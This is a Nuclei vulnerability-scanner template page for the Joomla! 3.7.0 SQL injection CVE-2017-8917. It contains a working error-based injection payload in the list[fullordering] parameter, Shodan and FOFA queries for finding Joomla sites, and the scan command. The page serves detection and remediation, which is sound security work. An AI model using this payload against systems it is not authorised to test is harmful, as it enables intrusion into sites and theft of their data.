Skip to content
Nuclei Templates

Joomla! <3.7.1 - SQL Injection

ID: CVE-2017-8917

Severity: critical

Author: princechaddha

Tags: cve2017,cve,joomla,sqli

Description

Section titled “Description”

Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2017-8917


info:
  name: Joomla! <3.7.1 - SQL Injection
  author: princechaddha
  severity: critical
  description: |
    Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.
  remediation: |
    Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability.
  reference:
    - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8917
    - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
    - http://www.securitytracker.com/id/1038522
    - https://github.com/binfed/cms-exp
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-8917
    cwe-id: CWE-89
    epss-score: 0.97555
    epss-percentile: 0.99998
    cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: joomla
    product: joomla\!
    shodan-query:
      - http.component:"Joomla"
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve2017,cve,joomla,sqli
variables:
  num: "999999999"


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"


    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
# digest: 4a0a00473045022100c4d4d2bdc3e6c25e4eeeeb8e3912b50a9761949b858cea03101e254378c249a5022032536f02099f4cfa6ea37ed15cf15e4411fc3d70d52f2f75e6a40bc81a62baba:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-8917.yaml"

View on Github